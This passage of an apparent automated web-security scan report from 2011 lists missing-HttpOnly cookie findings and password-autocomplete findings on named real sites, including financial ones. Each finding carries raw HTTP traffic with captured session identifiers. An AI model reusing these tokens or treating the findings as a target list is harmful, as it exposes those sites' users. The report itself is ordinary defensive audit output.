<div class="sc_pc" id="images"><ul class="sc_hl1"><li><a href="/images/search?q=wallpaper+filterui%3aimagesize-desktop_w_1024+filterui%3aimagesize-desktop_h_768&amp;qpvt=wallpaper" onmousedown="return
...[SNIP]...

15.153. http://www.bizographics.com/collect/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /collect/?fmt=gif&url=response.firstdata.com&pid=1009 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
Referer: http://response.firstdata.com/?elqPURLPage=15
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=55f5fe79-12b4-4f78-9976-61924d438e85; BizoData=xpA78UaP5mY4YDpjM3cPh9Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KQFMYVM1J6enaj5XcunNcMDa7Re6IGD4lDGXtlaauKpHAd6xyMUDLG6HwNFYBuERpuip6J7BXd0x4sE9pUJC88Pe5yXHOj6bWJ8aODe9cOOkiim9Da6XiirwxBAB0ZFDipA0aleYkLyGipuiicoxOXJii2rplrpQCQEipwV9h67ETqsE1eipWwwnuFtpqEzDeP3Y84mqpw7c8rqipRMEYPOEhN8UMj4XYITcDlTehMXv6yypp6AmSipxPddYpylx7e4dpBDiij57vFe2oBf0ipmt6RRlAydgIWkGDyfisfDPHdMovfSDMpZP3LipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6lnG4WL41W3AH0xNl7tETxisC5GEKyPhHoyiihEliiiihEZXwieie; BizoNetworkPartnerIndex=3

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Content-Language: en-US
Date: Mon, 25 Apr 2011 23:44:11 GMT
Location: http://ad.bizo.com/pixel?id=1258184&t=2
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=55f5fe79-12b4-4f78-9976-61924d438e85; Domain=.bizographics.com; Expires=Tue, 25-Oct-2011 11:44:11 GMT; Path=/
Set-Cookie: BizoData=BiimYs2dCnnkYokR5LALIdNQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KRwyz8QeClGZaj5XcunNcMDa7Re6IGD4lOgzJypdKRL6Ad6xyMUDLG7Ls3W4E4jF1liisFhqr12LzsIxjybldL0GQrQ8ohAZLAMaODe9cOOkiim9Da6XiirwxBAB0ZFDipA0aleYkLyGipuiicoxOXJii2rplrpQCQEipwV9h67ETqsE1eipWwwnuFtpqEzDeP3Y84mqpw8axzZEGMHjfOEhN8UMj4XaoP57SMbkTjDOsfxe0q98KOVcdy2PXFii1PU6e2biipKbWwErwOA1uvGg1WadM37je21ySjBqI9OZvePk1jYeANuipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6lnG4WL41W3AH0xNl7tETxisC5GEKyPhHoyiihEliiiihEZXwieie; Domain=.bizographics.com; Expires=Tue, 25-Oct-2011 11:44:11 GMT; Path=/
Content-Length: 0
Connection: keep-alive


15.154. http://www.bridgefront.com/cart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bridgefront.com
Path:   /cart/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cart/ HTTP/1.1
Host: www.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:23:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Set-Cookie: osCsid=sggkjb8k1c1rugrrvf2g0d37e3; path=/cart/; domain=bridgefront.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25447

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="LTR" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>BridgeFront - Shopping
...[SNIP]...

15.155. http://www.directbrand.com/tracking202/redirect/pci.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.directbrand.com
Path:   /tracking202/redirect/pci.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tracking202/redirect/pci.php?pci=535621131 HTTP/1.1
Host: www.directbrand.com
Proxy-Connection: keep-alive
Referer: http://www.cleanallspyware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tracking202subid=3562113; tracking202subid_a_142=3562113

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 13:58:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Set-Cookie: tracking202subid=3562113; expires=Thu, 26-May-2011 13:58:29 GMT; path=/; domain=www.directbrand.com
Set-Cookie: tracking202subid_a_142=3562113; expires=Thu, 26-May-2011 13:58:29 GMT; path=/; domain=www.directbrand.com
location: http://threats2.paretologic.revenuewire.net/pcha/download?3562113
Content-Length: 0
Connection: close
Content-Type: text/html


15.156. http://www.directbrand.com/tracking202/static/record.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.directbrand.com
Path:   /tracking202/static/record.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tracking202/static/record.php?lpip=92317&t202id=&t202kw=&OVRAW=&OVKEY=&OVMTC=&c1=&c2=&c3=&c4=&target_passthrough=&keyword=&referer=http%3A%2F%2Fcleanallspyware.com%2FSpam&resolution=1920x1200&language=en HTTP/1.1
Host: www.directbrand.com
Proxy-Connection: keep-alive
Referer: http://www.cleanallspyware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:52:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Set-Cookie: tracking202subid=3562114; expires=Thu, 26-May-2011 13:52:39 GMT; path=/; domain=www.directbrand.com
Set-Cookie: tracking202subid_a_142=3562114; expires=Thu, 26-May-2011 13:52:39 GMT; path=/; domain=www.directbrand.com
Content-Length: 488
Connection: close
Content-Type: text/html


function t202initB() {

   var subid ='3562114';
   createCookie('tracking202subid',subid,0);

   var outbound = 'http://www.directbrand.com/tracking202/redirect/pci.php?pci=435621146';
   createCookie('tr
...[SNIP]...

15.157. http://www.firstdata.com/en_us/about-first-data/media/press-releases/04_11_11  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstdata.com
Path:   /en_us/about-first-data/media/press-releases/04_11_11

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_us/about-first-data/media/press-releases/04_11_11 HTTP/1.1
Host: www.firstdata.com
Proxy-Connection: keep-alive
Referer: http://www.firstdata.com/en_us/home
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: countryCode=en_us; JSESSIONID=8B02942E5F37E07568A66BE00C61FBE6; __utmz=269008486.1303775197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269008486.510355525.1303775197.1303775197.1303775197.1; __utmc=269008486; __utmb=269008486.5.10.1303775197; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dfirstdataprod%253D%252526pid%25253Den_us%2525253Ahome%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.firstdata.com/en_us/about-first-data/media/press-releases/04_11_11%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:00:01 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: countryCode=en_us; Expires=Sun, 14-May-2079 03:14:09 GMT; Path=/
Via: 1.1 firstdata.com
Content-Length: 33202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>First
...[SNIP]...

15.158. http://www.firstdata.com/en_us/about-first-data/media/press-releases/04_12_11  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstdata.com
Path:   /en_us/about-first-data/media/press-releases/04_12_11

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_us/about-first-data/media/press-releases/04_12_11 HTTP/1.1
Host: www.firstdata.com
Proxy-Connection: keep-alive
Referer: http://www.firstdata.com/en_us/home
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: countryCode=en_us; JSESSIONID=8B02942E5F37E07568A66BE00C61FBE6; __utmz=269008486.1303775197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269008486.510355525.1303775197.1303775197.1303775197.1; __utmc=269008486; __utmb=269008486.5.10.1303775197; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dfirstdataprod%253D%252526pid%25253Den_us%2525253Ahome%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.firstdata.com/en_us/about-first-data/media/press-releases/04_12_11%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:00:01 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: countryCode=en_us; Expires=Sun, 14-May-2079 03:14:09 GMT; Path=/
Via: 1.1 firstdata.com
Content-Length: 32907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>First
...[SNIP]...

15.159. https://www.fs.ustrust.com/login/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fs.ustrust.com
Path:   /login/login.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login/login.aspx?sgt=1 HTTP/1.1
Host: www.fs.ustrust.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:27:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
geh-svr-hex: 3D2F794B
Set-Cookie: Bear=HdC5r0QnFpMuvDTYknZMKN4FD4TbXTCUXG9mmgSSpfc=; domain=.fs.ustrust.com; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 79822


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head lang="en-us"><met
...[SNIP]...

15.160. http://www.googleadservices.com/pagead/aclk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/aclk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/aclk?sa=L&ai=CcAQr4Qa2TcXTNIratgfCkKVJ5YmV1AH98sm3Frf0p_McCAAQAigDUNKMvOH6_____wFgye6DiPCj7BKgAfOr8_4DyAEBqgQdT9CM_Hg02j2oGv29hhfq2HGVID_3pvdg4bTSf9I&val=ChAwNzcyYzlkNWVmMTNhYWFmENGWre0EGgjG9uMLiwzAayABKAAwj6b1wsnDmv3hATiKiMPtBECXkNftBA&sig=AGiWqtyX3h01gY39Flqfm3CJ24IuVs6FaA&adurl=http://www.tenable.com/services/nessus-perimeter-service HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Set-Cookie: Conversion=CogBQ2NBUXI0UWEyVGNYVE5JcmF0Z2ZDa0tWSjVZbVYxQUg5OHNtM0ZyZjBwX01jQ0FBUUFpZ0RVTktNdk9INl9fX19fd0ZneWU2RGlQQ2o3QktnQWZPcjhfNER5QUVCcWdRZFQ5Q01fSGcwMmoyb0d2MjloaGZxMkhHVklEXzNwdmRnNGJUU2Y5SRITCIrvsMTsuKgCFYFM5Qodk1P5CRgBIJWWi9at1LXLckgB; expires=Wed, 25-May-2011 23:44:07 GMT; path=/pagead/conversion/1071437299/
Cache-Control: private
Location: http://www.tenable.com/services/nessus-perimeter-service?gclid=CIrvsMTsuKgCFYFM5Qodk1P5CQ
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 23:44:07 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block


15.161. http://www.is3.com/about/contactUs.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.is3.com
Path:   /about/contactUs.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/contactUs.do HTTP/1.1
Host: www.is3.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 26 Apr 2011 13:58:56 GMT
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 13:58:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI CURa ADMa DEVa OUR BUS COM NAV", policyref="/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vvivob45vz2sv1nc3pbgld55; path=/; HttpOnly
Set-Cookie: VisitorInfo=AffiliateID=9000&SubAffiliateID=&CampaignID=_UNDEFINED&HttpReferrer=_NO_REFERER&DateRecorded=4/26/2011 9:58:56 AM; domain=.is3.com; expires=Wed, 25-Apr-2012 13:58:56 GMT; path=/
Vary: Accept-Encoding
Content-Length: 22842


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="ctl00_ctl00_Head1">
   
<!-- BEGIN RESOURCE: is3_site\content\html_head_main
...[SNIP]...

15.162. https://www.merrilledge.com/m/pages/home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /m/pages/home.aspx HTTP/1.1
Host: www.merrilledge.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:27:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=jLP3XoAxGsv1v6MwPZhahlP/aoO3xH/srhMcrJj795J+eDNFXiPfjzck1kD4CBi+6ie4KrwamlTHaXTZUdECRzrFky9gNvwqK2gfsTdEDm7sAur5XVP4PPYin3ZpmEGZhp4U9tI/R2PBhf10C0GUszchafmuD9bl4ok1Tou4xpWvp8+gJofMVxln5UHKDCa81PkeNNVr9tnGgUbb8xfUqJ9mQ+4UmQUBAvTOqlILImkN5L5gXWD34cRgwFSZ2KnJ3H2WELiFxhYRFU/W8/5hb7Ab0vdhSiKgU1mzlw6G++AaFuJs+7z65oKRdeBCqK0hIz3tim19s96RERtkf9rfjHj+6RDI79fjrabVGOlnraDPyBxJbqaBTLfWCRw+ylCtGUKvwL6+os3qLez4GsDok2Qd+n4qvsQdjjUilaWTMSP27nak6lbRwCk4b/M4No0d4wzcrSvMyENoATzMp8aftIfSjmRgRvGUNASAKrTSpR5rfw6e36o6v3gAJa9Ivvp8bVC7cNorr2VzTikkqJI1i1lWvbV9SNzGVXk61fudxdZpjJjPAMIp9cah6rKP6ckESa6k8l1TR7oiXNRlH9EEi7eiYAWvwxgHlp0pcxiP0RMD9/1rRGHkXk3lzz8V7861; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=341ce30bc7594740a1c8d88f714e0605; domain=.merrilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 107200


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...

15.163. http://www.nuclearpesticide.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nuclearpesticide.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?epl=GWxgAxA73QxrLsd2C6qmPnS3ZN9CQuEUyV38MxNtdDzbPO8DkWEHRIZAwJEDpKPH-fRZWF7ASJjVMurhyobiRLm-kN1iK6-u1SwKVBQvmQiJThLEwAFhK8C7kmCnqgZgRKGT6s5H2tSm7aABlEc9EG3U5CmC9DSATFOjTU2bhiJ0ACAQ3ue_AADgfwUAAECAWwkAAN0t2bdZUyZZQTE2aFpChgAAAPA HTTP/1.1
Host: www.nuclearpesticide.com
Proxy-Connection: keep-alive
Referer: http://www.nuclearpesticide.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: parkinglot=1

Response

HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://www.dsnextgen.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: nuclearpesticide.com=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1303825557%7Cclick%3A0%7Cblocked%3A0; path=/; expires=Wed, 27-Apr-2011 13:45:58 GMT
Set-Cookie: ident=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1303825557%7Cclick%3A0%7Cblocked%3A0%7Ctoken%3Auvzrwspvuywxprvv; path=/; expires=Wed, 27-Apr-2011 13:45:58 GMT
Set-Cookie: Spusr=a0015ac11ef4db6cc951a4c; path=/; expires=Thu, 25-Apr-2013 13:45:58 GMT
Connection: Keep-Alive
Content-Length: 52423

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<!-- turing_cluster_prod -->
<html>
<head> <title> nuclearpesticide.com </title>
<meta http-equiv="Keywords
...[SNIP]...

15.164. http://www.paretologic.com/download/pchealthadvisor/revenuewire/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paretologic.com
Path:   /download/pchealthadvisor/revenuewire/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /download/pchealthadvisor/revenuewire/ HTTP/1.1
Host: www.paretologic.com
Proxy-Connection: keep-alive
Referer: http://www.cleanallspyware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: http://dl3.paretologic.com/webair/dl3/downloads/pchealthadvisor/en/ParetoLogic%20PC%20Health%20Advisor.exe
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.4
Set-Cookie: pl_20=740837; expires=Wed, 25-Apr-2012 13:59:05 GMT; path=/; domain=paretologic.com
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 13:59:04 GMT
Content-Length: 229

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://dl3.paretologic.com/webair/dl3/downloads/pchealthadvisor/en/ParetoLogic%20PC%20Health%2
...[SNIP]...

16. Password field with autocomplete enabled  previous  next
There are 30 instances of this issue:


16.1. https://account.snap.com/signup.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://account.snap.com
Path:   /signup.php

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

POST /signup.php HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: https://account.snap.com/signup.php
Cache-Control: max-age=0
Origin: https://account.snap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary98PnGqmjFSQtVOMB
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435; PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b
Content-Length: 792

------WebKitFormBoundary98PnGqmjFSQtVOMB
Content-Disposition: form-data; name="key"

81a33c00e5b2572629a04571cb191964
------WebKitFormBoundary98PnGqmjFSQtVOMB
Content-Disposition: form-data; name
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 02:04:01 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-t
...[SNIP]...
</div>
   
   <form id="setup_form" name="setup_form" action="/signup.php" method="post">

   
   <div id="column2">
...[SNIP]...
<br />
           <input class="text" type="password" name="password" maxlength="20" value="" /></li>
...[SNIP]...
<br />
           <input class="text" type="password" name="re-enter_password" maxlength="20" value="" /></li>
...[SNIP]...

16.2. http://afreshbunch.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /?page=login&cmd=register HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.10.10.1303778640

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 29083
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:05:01 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
